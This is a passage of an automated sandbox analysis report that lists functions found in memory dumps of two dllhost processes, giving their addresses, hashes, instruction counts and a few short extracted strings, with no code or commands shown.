                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction ID: 1dc40e4b13cd0e24aaa99327bff96a2b72f5a012074c7d030570574b51e93189
                                      • Opcode Fuzzy Hash: d18e80f510b7454b457dd04e8256d1bc12cc23cb8ed179144c3c259b6b8a5607
                                      • Instruction Fuzzy Hash: 25C04C16F5AD3B01BC157D6E58E60FCA1406FD7A21FD51176D70CD00C59DCD20D52156
                                      Function 00007FFD346912B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: f08b973c628f22c78451e1f57d208aa1cd9d771bfa9d39f9ffd83c9f8a033d07
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: 5CC08C305208088FCA48EB28C98480433E0FB0A200BC10090E008C7170D269DCC1C740
                                      Function 00007FFD34693416 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f343883bee5461eb025c2adc2cc40d575af058576cc95c2446b4c0d89b0cea1
                                      • Instruction ID: f737a38606767f2647a6fe6d7e9d9c7c52559b83262f043ccf03ee4e598a4f39
                                      • Opcode Fuzzy Hash: 2f343883bee5461eb025c2adc2cc40d575af058576cc95c2446b4c0d89b0cea1
                                      • Instruction Fuzzy Hash: 2BC08C00F0896A42F621A28480313BE00829F40708F540030E00EE23CACC4C5F0102C6
                                      Function 00007FFD346906C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: 0e861303381caf619999a105ec1ac9ee3160302702a47f936a36cd7149efe04e
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 47B01204F5682F00A8043D7A08D20E470406B46510FC01074DA0CC008598CD20942242
                                      Function 00007FFD34693A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: be61b1e624d3aefda69dbf88129ba16d7977287dd2fa89b736bd07e7d49666bd
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 2FC09B21F1D525C1FB25593044551FD71555F5A304F554571C14EE7081DE7C59056541

                                      Non-executed Functions

                                      Function 00007FFD346909B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000029.00000002.2543294089.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_41_2_7ffd34690000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 55e1502d4f2cbba85a5a315411474ee340a588bdcb96266a5c91bc417db13d41
                                      • Instruction ID: 5f21b53e61e4cc1205d7d0275d84a0ddc0e5568a2cd430bef4e8112bb6c1df3d
                                      • Opcode Fuzzy Hash: 55e1502d4f2cbba85a5a315411474ee340a588bdcb96266a5c91bc417db13d41
                                      • Instruction Fuzzy Hash: 8551C503B4C66345E22237FDB4620FF6B88DFE237EB484677D18CE90934D19608686E5

                                      Executed Functions

                                      Function 00007FFD34670D4C Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: f2c84476dbaa772fc6dd66bb3119a42caf0f7964d9fc0089356bf656381ceaf2
                                      • Instruction ID: a2cab7626e82948b04588ba7886b0b457fd82e1f559894b44f7388b52eb65706
                                      • Opcode Fuzzy Hash: f2c84476dbaa772fc6dd66bb3119a42caf0f7964d9fc0089356bf656381ceaf2
                                      • Instruction Fuzzy Hash: 1791E271A08B994FE799DFACC8753E97FE1FB66300F0041AAD249D72D2CA782815C750
                                      Function 00007FFD34670E43 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e2e6a6b81e681211f9828fd125caa4ce6aecd58e2b2af9b90d36662518847ed
                                      • Instruction ID: 09a2d6676a8b6f22860ceec7c045db879ca85896edffaaabf332f6da374cdcd0
                                      • Opcode Fuzzy Hash: 9e2e6a6b81e681211f9828fd125caa4ce6aecd58e2b2af9b90d36662518847ed
                                      • Instruction Fuzzy Hash: 8251E172A18A598FE798CF9CC8A57E87FE1FB9A314F5001BED209D37D1CAB914258740
                                      Function 00007FFD346708D0 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                      • Instruction ID: b243aea91e8d69f4ba5a3beddb14fc92c2972928b0aa9c25ad23d9e29c5cd3a4
                                      • Opcode Fuzzy Hash: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                      • Instruction Fuzzy Hash: 6441153270CA654FD724EBACE4A99FA7BD0EF9632570445BBD1CACB063DD14AC818781
                                      Function 00007FFD3467090D Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87586421ccf69d3645c66a681accf7a2ee138fc9625de308e91f18f6e956dca0
                                      • Instruction ID: c58e116b785d2c98c6981b4d842bc00e108a106c8adb8346a7581b94f0e056d7
                                      • Opcode Fuzzy Hash: 87586421ccf69d3645c66a681accf7a2ee138fc9625de308e91f18f6e956dca0
                                      • Instruction Fuzzy Hash: 25411412B4D6A50EE724B7F8A8BA1FA7F90DF96325B1444BFD18EC7193CD1CA8418285
                                      Function 00007FFD34670908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                      • Instruction ID: cab018fffbddeebe180e5f702fddd9dc9dd0e53faa08d72be1b0c9af4aa03b65
                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                      • Instruction Fuzzy Hash: 1021D83130CC184FE768EA5CEC89DB977D1EB5A32170541BAE58EC7165E921EC9287C1
                                      Function 00007FFD3467116D Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae6c0acfc7ae883281893685fe221877898eeb64c32645bd80fbf4511d1f7b09
                                      • Instruction ID: b69866d41b5d9eb2df1af8a672730df696d6d893e2ff066fb158a3b5da781352
                                      • Opcode Fuzzy Hash: ae6c0acfc7ae883281893685fe221877898eeb64c32645bd80fbf4511d1f7b09
                                      • Instruction Fuzzy Hash: 2141A631A096598FDF45EF68CCA59E97FE1EF5A310B0441BBD109DB293DA2DA841C740
                                      Function 00007FFD34670960 Relevance: .1, Instructions: 116COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b88c07979410c4a7246dfbb955d0108acac2930488c3622c393ca9df7049d6b
                                      • Instruction ID: 3513dcf5c3f7caec3751742f442d75a89aa34b149322bb842f7450d927412475
                                      • Opcode Fuzzy Hash: 3b88c07979410c4a7246dfbb955d0108acac2930488c3622c393ca9df7049d6b
                                      • Instruction Fuzzy Hash: 39314821B0DA651FF764BAB8A8BA1FA7BC1DF96326F1444BED54EC31D3CC1CA8415284
                                      Function 00007FFD34670998 Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f3e3c5d5c49bf0c1affa0293ac66eb16d4d06333661c627bbdbc32a36629d0f
                                      • Instruction ID: 89035573b6f39f708fa08a8bb0b92f8b3bd9fb3462355b64c7c2d1efad758b29
                                      • Opcode Fuzzy Hash: 2f3e3c5d5c49bf0c1affa0293ac66eb16d4d06333661c627bbdbc32a36629d0f
                                      • Instruction Fuzzy Hash: 27310821B0D9650FE798AB6888AA6B97BD2EF9A311F1440BED54EC32D3DD18AC419344
                                      Function 00007FFD34670C25 Relevance: .1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e41a441bfe718bf8df4810dac61ab8db5d951afc338e6a8c8bd3209e0201c02a
                                      • Instruction ID: 5f4c2b3eeb7d5486e8fee7de3398960f11598a616211545ad238388af1ea9e0b
                                      • Opcode Fuzzy Hash: e41a441bfe718bf8df4810dac61ab8db5d951afc338e6a8c8bd3209e0201c02a
                                      • Instruction Fuzzy Hash: 6E313A75B0DA598FE7119FA88CA12ED7FA0EF43325F1480B6D248CB1C3D93CA44697A1
                                      Function 00007FFD346769E3 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ff748e917cd453df4fdde5923a6312c1456426e0b8128b2e2605db2ef225ca9
                                      • Instruction ID: 0132e0443ebb35a2904536eae234fdf6763030710f04aa4918fef60d3e9036ad
                                      • Opcode Fuzzy Hash: 7ff748e917cd453df4fdde5923a6312c1456426e0b8128b2e2605db2ef225ca9
                                      • Instruction Fuzzy Hash: 2D212F30E185698FDB65DF04C8A47E9B7E1FB58314F1085EAC50EE3291CA79AE85CB40
                                      Function 00007FFD34670C38 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab68ed956653d2722945e2deaaaffb8d80bbb2c3743cd6bac7619b2244a100c3
                                      • Instruction ID: a05097894a35d74d2ef0de38baec3a3f454657406283e25b8db1f2cc4380ff83
                                      • Opcode Fuzzy Hash: ab68ed956653d2722945e2deaaaffb8d80bbb2c3743cd6bac7619b2244a100c3
                                      • Instruction Fuzzy Hash: 6F11A375B0DA598FE701DF688CA11ED7FA0EF53311F1480B6C244D7182D93CA54697A0
                                      Function 00007FFD34670C40 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bccbca5b6a8d24362356f4cff4162a8321bf1519d9c653cc19cbedad45f95ca
                                      • Instruction ID: e315a2fc8b54b6efee7c769c38e673eb003daa2957f3fbca91037f8872835c68
                                      • Opcode Fuzzy Hash: 3bccbca5b6a8d24362356f4cff4162a8321bf1519d9c653cc19cbedad45f95ca
                                      • Instruction Fuzzy Hash: 7F11A175A0EA998FE702DF688CA11ED7FB0EF53311F1480B6C144DB192D93CA64597A0
                                      Function 00007FFD34670C48 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f3e525a73533dad76fce7fed9db3b0746ac62aa26321f8b09999656ea351708
                                      • Instruction ID: edc72585410a37197f0b7c87696c0ab7dfe2772f581542fd53d89dba80b0eab1
                                      • Opcode Fuzzy Hash: 3f3e525a73533dad76fce7fed9db3b0746ac62aa26321f8b09999656ea351708
                                      • Instruction Fuzzy Hash: 5501CC75A0E6898FEB02DF688CA00ED7FB0EF43310F1480F6C144DB192E938AA4597A0
                                      Function 00007FFD346733F1 Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8167646523b88015d60b2965b5c5cef0992c7fbae94de9fbc5bc4e88dc7bd960
                                      • Instruction ID: 6384d8a2d336c9391cedef3dfa91f7428ee8066c97781bdf43a1e6713bc9fe53
                                      • Opcode Fuzzy Hash: 8167646523b88015d60b2965b5c5cef0992c7fbae94de9fbc5bc4e88dc7bd960
                                      • Instruction Fuzzy Hash: 30E09222F0C92A4BF7E8EA5888B62F92682DFC5715F044272D10DD3286DD1D6E428681
                                      Function 00007FFD34670B9A Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction ID: 0ddddaec18731370c55083221aa4fe8b908a74e4c18a5377988e28ef8b022148
                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                      • Instruction Fuzzy Hash: 33D012345668498FC650EB28DDD5494BB90FB0A214B8901D0D40CC7161D35A9894C701
                                      Function 00007FFD346706A5 Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                      • Instruction ID: 163ac17426cfaa936bd4e64242503c6a87e1f64411e332bd22776aca741b6fc1
                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                      • Instruction Fuzzy Hash: BEC08C04F0AC3B00B8003D2E1CF20ECAA006BC7610FD08132C30CD00C29C4D60C52166
                                      Function 00007FFD346712B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction ID: baf258ebea1d4c47d1b3421ab78be2f9bf44c70828946730f1126ce0835e0afe
                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                      • Instruction Fuzzy Hash: F3C04C345518098FCA48EB29CD9595477A0FB1A215BD50090E409C7171D65EDCD5D741
                                      Function 00007FFD346706C8 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: adcc7354541408074ee5c792c912e30747a66a74d7914581dab1ab40c654bd21
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 69B01204F5682F00A804397A0CD20E4B8405B46104FC05070D70CC00C6984D10D42252
                                      Function 00007FFD34673A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: 2a5b665479dfc35e86a068d77f527f98521f8822be16b1209a46d3a6d7e9adbd
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 4DC02B10F0C02480E7254D304C911FD39401F5A300F05C272C00ED2081CE3C68002100

                                      Non-executed Functions

                                      Function 00007FFD346709B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                      • Instruction ID: a82bc48983393078abda6fc7e0eb66b317426235214540b8481d0ad001dd28f7
                                      • Opcode Fuzzy Hash: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                      • Instruction Fuzzy Hash: 78517117B5C67246E22137FDB4611FF6B88DFE537EB488677D28CD90838C08648586E5